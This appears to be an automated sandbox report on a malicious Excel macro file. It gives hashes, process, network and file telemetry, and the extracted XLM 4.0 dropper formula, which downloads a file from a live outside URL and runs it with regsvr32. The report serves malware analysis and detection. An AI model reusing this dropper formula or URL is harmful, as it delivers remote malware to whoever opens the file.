Analysis

  • max time kernel
    133s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/11/2024, 23:23 UTC

General

  • Target

    f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25.xlsm

  • Size

    38KB

  • MD5

    68bb87d405663f89976f2646ce87a7d5

  • SHA1

    01b51b47b141f27baa890dd6781d86cb4ddb19c7

  • SHA256

    f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25

  • SHA512

    91411e57372cbdf67fc175da34a4202a44788c43c2f2ef6278a854eff4a4b63badf3dfa20b7e1edd848295d8228152bf6410b95c0d4fecfe695351592f64bb8d

  • SSDEEP

    768:3+d/GCR8UjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyu:3WT9OZZ1ZYpoQ/pMAeVIy08a

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/", "..\wnru.ocx")
URLs
xlm40.dropper

https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:404

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    neu-azsc-000.roaming.officeapps.live.com
    neu-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    IN A
    52.109.76.243
  • flag-ie
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.76.243:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_356
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: neu-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-2xfW7fO8Y6QNpkYBJZRR1fgfMTulssIe2suN1RiJDdIvcR14C4yrjChRt/OXqhxvax/nZTf7bquN8LPHhUzLX+j9GKgCVQu3AkW6aqUn7O4Vk/vd/T5cAWB+MLb6WofzX114R+Vs7CmiNcPm7F3bTdVYKVwO/wWemNdAwb6hOtU=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: a2835f57-0094-4f5f-abb8-ca0faa104956
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 23:23:59 GMT
    Content-Length: 654
  • flag-us
    DNS
    al-brik.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    al-brik.com
    IN A
    Response
    al-brik.com
    IN A
    13.248.213.45
    al-brik.com
    IN A
    76.223.67.189
  • flag-us
    GET
    https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
    EXCEL.EXE
    Remote address:
    13.248.213.45:443
    Request
    GET /vb/pjD6kXT79JBgdqhtgBU/ HTTP/2.0
    host: al-brik.com
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 200
    content-type: text/html
    content-length: 114
    date: Wed, 20 Nov 2024 23:24:00 GMT
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    243.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    243.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    45.213.248.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    45.213.248.13.in-addr.arpa
    IN PTR
    Response
    45.213.248.13.in-addr.arpa
    IN PTR
    a67c48129651a0940.awsglobalaccelerator.com
  • flag-us
    DNS
    36.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    36.249.124.192.in-addr.arpa
    IN PTR
    Response
    36.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10036.sucuri.net
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    29.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.76.243:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
    8.2kB
    12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 13.248.213.45:443
    https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
    tls, http2
    EXCEL.EXE
    1.3kB
    4.3kB
    15
    10

    HTTP Request

    GET https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

    HTTP Response

    200
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
    248 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.76.243

  • 8.8.8.8:53
    al-brik.com
    dns
    EXCEL.EXE
    57 B
    89 B
    1
    1

    DNS Request

    al-brik.com

    DNS Response

    13.248.213.45
    76.223.67.189

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    243.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    243.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    45.213.248.13.in-addr.arpa
    dns
    72 B
    128 B
    1
    1

    DNS Request

    45.213.248.13.in-addr.arpa

  • 8.8.8.8:53
    36.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    36.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    11.173.189.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    29.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    29.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    596076cc86589b48c3e43b4c5afdb839

    SHA1

    0daabd711eb6ff09fc5e8aaa9662ce26906496c9

    SHA256

    636b3792ee355c05297d33161ad9b9af39ddf18ca442953c94b73f2036c3cc65

    SHA512

    77f2f32b5cedc1f3486cf239e8d79671d9f3b21fc1f6bd02a3835da4c4e909896da674b7817082088cc9427a101bf6c6bfe0f9c62cf0cb370bb179499f93d192

  • C:\Users\Admin\wnru.ocx

    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

  • memory/1412-14-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-12-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-5-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-4-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

  • memory/1412-7-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-8-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

  • memory/1412-11-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-15-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp

    Filesize

    64KB

  • memory/1412-2-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

  • memory/1412-13-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-16-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp

    Filesize

    64KB

  • memory/1412-1-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

  • memory/1412-17-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-10-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-9-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-6-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-0-0x00007FFD547AD000-0x00007FFD547AE000-memory.dmp

    Filesize

    4KB

  • memory/1412-38-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-39-0x00007FFD547AD000-0x00007FFD547AE000-memory.dmp

    Filesize

    4KB

  • memory/1412-40-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-3-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB
